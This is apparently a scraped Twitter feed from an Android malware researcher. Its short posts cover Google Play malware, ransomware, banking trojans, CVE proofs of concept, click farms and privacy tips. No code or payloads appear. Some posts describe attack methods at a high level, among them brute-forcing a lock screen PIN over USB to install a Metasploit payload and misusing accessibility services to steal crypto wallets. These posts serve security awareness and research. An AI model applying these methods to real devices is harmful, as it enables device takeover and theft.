Teenagers trying to make phone call on ancient apparatus
Follow
Lukas Stefanko
@LukasStefanko
Malware Researcher at
Android security, malware analysis, app vulnerability research
t.me/androidMalware
youtube.com/c/LukasStefank
Lukas Stefanko’s Tweets
Hacking into Android in 32 seconds
Samsung S7 is connected to Pixel as HID device (keyboard) that tries to brute force lock screen PIN and then download, install and launch Metasploit payload
Covid Android Ransomware
If you installed malicious Coronavirus Tracker app that locked your smartphone and requested ransom, use "4865083501" code to unlock it.
Key is hardcoded.
Quote Tweet
#ESETresearch ALERT: #COVID19 #Android #Ransomware: If you installed malicious Coronavirus Tracker app that locked your smartphone and requested ransom, use "4865083501" code to unlock it. Key is hardcoded. @LukasStefanko Details: domaintools.com/resources/blog
Android Trojan makes PayPal payment on behalf of user.
It sends $1,000 from victim's account every time user opens PayPal app.
welivesecurity.com/2018/12/11/and
Don't install these apps from Google Play - it's malware.
Details:
-13 apps
-all together 560,000+ installs
-after launch, hide itself icon
-downloads additional APK and makes user install it (unavailable now)
-2 apps are #Trending
-no legitimate functionality
-reported
"Our data breach happened using a highly professional attack with sophisticated social engineering"
I just found the most honest "Virus Cleaner 2018" on Google Play. Not only it detects itself as vulnerable it also recommends me to uninstall it. #InstallOnlyReliableSecurityApps
How easy it is to make user believe apps are highly downloaded(popular) and probably worth of trying.
These are not number of app installs, these are developer names.
Xiaomi now shows ads even in the Settings.
reddit.com/r/Android/comm
Looks like someone successfully created PoC for Android CVE-2019-2107 RCE
PoC: You can own the mobile by watching a video with payload. Should works on Android 7.0, 7.1.1, 7.1.2, 8.0, 8.1, 9.
github.com/marcinguy/CVE-
Have you ever seen two Android Banking Trojans beating each other for victim's credit card information? #Malware cc
Exploitation of LAN vulnerability found in Firefox for Android
I tested this PoC exploit on 3 devices on same wifi, it worked pretty well.
I was able to open custom URL on every smartphone using vulnerable Firefox (68.11.0 and below) found by gitlab.com/gitlab-com/gl-
Remotely Spying via #FaceTime
FaceTime any iOS 12.1 or later and you can remotely spy on them (audio and video) before they accept incoming call.
9to5mac.com/2019/01/28/fac
Courtesy of @BmManski
NetHunter Wi-Fi and Rubber Ducky mobile combo
Android NetHunter kernel supports many popular external wifi chipsets including lot of cheap adapters.
Rubber Ducky works without any problems on both devices so far.
#TicWatchPro #OnePlus7
Another click farm in China with 8,000 devices generates fake engagement
So, lets wait when someone hacks it for the first time. Is its control panel on Shodan already?
From
Matthew Brennan
Uninstall these apps!
15 apps with more than 400k+ installs in total found on Google Play.
These apps can download additional payload and display + click on "invisible" ads. Everything is hidden from user's view.
Mobile click farm, birthplace of fake engagement.
Fake impressions, boosts new social media trends, ad fraud, helps create influencers, leaves fake review, spreads likes, shares, install apps...
twitter.com/EnglishRussia1
Scam iOS apps has been found on Apple App Store tricking users to pay over $100
Apps ask for fingerprint right at the moment when paying pop-up shows, which is accepted by user fingerprint.
welivesecurity.com/2018/12/03/sca
What is this app rating?
Developer created tricky app icon to make potential users believe it has over 4 stars.
Purpose of the app is to trick user into activating 3 day trial for basic photo editing app.
If user forgets to cancel, it costs him €49.99/week.
This is Bob. Bob doesn't care about his mobile privacy.
Bob:
- doesn't close private tabs
- doesn't close browser
- doesn't lock his device
- face it up front in pocket
- goes into public transport
- take a nap
Don't be like a Bob. Be smart.
GIF
How to create fake traffic jams in Google Maps with bucket full of smartphones
Different perspective:
1) Buy mobile bots
2) Spoof GPS location
3) Control traffic
simonweckert.com/googlemapshack
Android Legitimate Spyware with 10M+ installs.
App #Onavo owned by Facebook, is VPN service that collects your:
- mobile traffic
- location
- installed/opened apps
- visited websites
This app should hide your traffic & increase privacy, instead it collects it.
Spoofing any website on Xiaomi's pre-installed browser
Be aware, it is NOT fixed yet and it could be misused for phishing credentials.
Discovered by
andmp.com/2019/04/xiaomi
RCE in Adobe Acrobat Reader for Android (CVE-2021-40724)
$10,000 bounty received from GPSRP
Excellent exploitation and write-up by
Report: hulkvision.github.io/blog/post1/
Quick summary how it was achieved👇
Remove is not Uninstall
Found 3 apps on Google Play with over 700,000 installs that use interesting persistence technique.
When user realizes app is not as described, he can only remove the app icon not uninstall the app itself.
How it works I explained it in the video:
Barcode Scanner app with 5,000,000+ installs became adware.
Should we be now afraid of even popular apps? Developer sold the app or took advantage?
-in 8 months app reached 5M+ installs
-after last update became adware
-uses own lockscreen
-display ads
-removed from Google Play
Beware of another fake version of found on Google Play Store with lots of fake positive reviews. It tries to steal user's private key.
BTW there isn't any official MyEtherWallet on GP, yet. #reported
Replying to
Security without pentests: Home Alone edition 8⃣
Android malware can send WhatsApp messages from infected device to spread itself + uses TOR.
What happened in video:
-request to activate accessibility service
-activates device admin
-set itself as default SMS app
-downloads payload
-downloads TOR
Found month ago by
Android Banker found on Google Play with 10K+ installs stole over 10,000 Euros already.
Video example how it misuses accessibility services and overlays banking app (1:09).
lukasstefanko.com/2018/09/bankin
Vulnerability in Google's Camera app allowed 3rd party apps to take pictures and video without user knowledge or CAMERA permission.
This happened because of exported CameraActivity that accepted input from other apps. CVE-2019-2234
checkmarx.com/blog/how-attac via
I tested over 15 fake GPS Navigation apps with over 50,000,000 installs from #GooglePlay that violate Google rules.
These apps just open Google Maps or use their API without any additional value for user, except for displaying ads.
Some of them don't even have proper app icon.
Imagine, Android ransomware that could lock you out of your car.
If Smart key app is installed then triple ransom.
twitter.com/somospostpc/st
Android Trojan controlled via Telegram spies on Iranian users. Can take pics, make call, send SMS, steal data. #Iran
news.drweb.com/show/?i=11331&
Would you use AntiVirus that detect itself as risky app?
This Fake Antivirus 2019 uses only blacklist & whitelist for package names of apps + permissions check. Still forget to whitelist itself.
Using the free antivirus software that comes with your computer.
0-click RCE via MMS exploit for Samsung's Android OS versions O(8.x), P(9.0) and Q(10.0) #Fuzzing CVE-2020-8899
googleprojectzero.blogspot.com/2020/07/mms-ex
Demo: youtu.be/ZQnb8kRMkHg
APKLeaks in action
Handy utility that dumps IPs, URLs, URIs or secrets from analyzed Android app
Now you know where backups are stored and maybe test these ZIPs for DIR traversal 👇
github.com/dwisiswant0/ap by
Demo of Binance wallet theft using Accessibility services
Android PoC malware misuses accessibility to take control over device to withdraw Bitcoins without any user interaction.
Binance swiftly fixed the issue.
Research & video by
Paper: link.springer.com/chapter/10.100
The first Android Crypto-Ransomware that misuses accessibility services + encrypts data + changes PIN. #DoubleLocker
welivesecurity.com/2017/10/13/dou
Today I found 22 apps containing adware still available on Google Play with altogether 3,2M+ installs.
These apps hides after launch and display fullscreen ads every time user unlocks device.
Steps how to identify & remove such adware in video (1:36)
Android SMS Worm spreads in #India 🇮🇳
-spreads via SMS and WhatsApp as "Free 25GB Offer" app
-only for Jio customers
Goal: spread & ads monetization
App in background sends SMS to contacts if they have Jio number prefix.
Demo: Download + Install + Open
Found by
Android malware analysis + OSINT
How I tracked down the developer of 42 Android adware apps on Google Play with 8,000,000+ installs.
welivesecurity.com/2019/10/24/tra
Trojanized #WhatsApp and #Telegram apps replace cryptocurrency wallet addresses in messages
Some of them use OCR to recognize mnemonic phrase text from screenshots and photos stored on the devices to steal cryptocurrency funds
welivesecurity.com/2023/03/16/not #Android #Windows
Google Pixel did really well and wasn't successfully pwned at mobile #Pwn2Own.
We can't say that about iPhone. Apparently Adrian was right.
After couple requests I created Telegram Channel
To stay up-to-date with mobile security feel free to Join and share.
Topics: Security & privacy, malware on Google Play, vulnerabilities, bug bounty hunting, security tips, tutorials, penetration testing..
The First Android cryptocurrency clipboard exchanger found on Google Play.
Its goal is to change copied address of cryptocurrency wallet of recipient for the attacker's.
Malware also impersonates service and lures PK, password or phrase.
welivesecurity.com/2019/02/08/fir
Replying to
My similar "security without pentests" collection:
Quote Tweet
This is how Android malware steals recovery phrase from Trust Crypto Wallet without user interaction and restricts access to victims smartphone by blocking all the actions such as removing it and seeing any unauthorized withdraws
Full demo: youtu.be/cI9GbhspMYY
Quote Tweet
Some kind of crypto wallet stealer which sends your keys via Telegram. Also includes a C2 URL.
Low detected: virustotal.com/gui/file/6f899
cc @malwrhunterteam
More infected ATM's in Indonesia by #WannaCry. Updated picture collection from infected countries [60 pics]
b0n1.blogspot.com/2017/05/wannac
Replying to
How to prevent this happening
-charge you smartphone using you own adapter if possible
-don't use trivial PIN or password lock screen protection
-use mobile security software that will detect Metasploit payload
Android WhatsApp Worm?
Malware spreads via victim's WhatsApp by automatically replying to any received WhatsApp message notification with a link to malicious Huawei Mobile app.
Message is sent only once per hour to the same contact.
It looks to be adware or subscription scam.
How Google verify apps before uploading them to Play Store
GIF
How to uninstall "invisible icon" app?
App with 500K+ installs found on Google Play using "invisible icon" trick to stay hidden from user's view.
This app is not malicious, but this simple trick can be easily misused in the future. #DiscloseApp
Almost every Android phone - except for Pixel - is still vulnerable to this RCE bug.
That's because Manufacturers don't push security updates right away.
BTW, Samsung devices are the most popular unpatched phones on the planet.
CSRF + XSS + SMS spoofing + Android deep link URL redirection
Great example of chaining low impact vulnerabilities in #TikTok to remotely manipulate account content
-delete user video
-upload user video
-make "private" videos "public"
research.checkpoint.com/2020/tik-or-to via
Scareware Youtube ads "Your Phone has Virus ⚠️" techniques are misused to promote lousy Android antivirus app.
BTW, this app has 100K+ installs and has been available on Google Play only since Jul 5, 2019 without any reference or web site
P.S. So, my phone has 13 or 23 viruses?
Whenever you ask #infosec community on Twitter if you should disclose new vulnerability. #ESETAppWatch
SMS worm impersonates Covid-19 vaccine free registration
Android SMS worm tries to spread via text messages as fake free registration for Covid-19 vaccine - targets India 🇮🇳
It can spread itself via SMS to victim contacts with link to download this malware.
Quote Tweet
"Covid-19.apk" seen from India: 5522a7cc358b4193eac53e620d3baa47f385a04bf3d15d1850076cce9456d5f4
Don't be quiet, no matter who is listening.
Recently discovered Android banking Trojan on Google Play by had malicious package name containing my name and hi_there message for me.
If you are reading this, next time I want my profile_pic signed by you in there. :)
I just finished Web Security Academy labs
It's great learning source with free trainings + labs to test your skills:
-SQL injection
-XSS
-OS command injection
-DIR traversal
Hope, we can expect more topics to come
portswigger.net/web-security
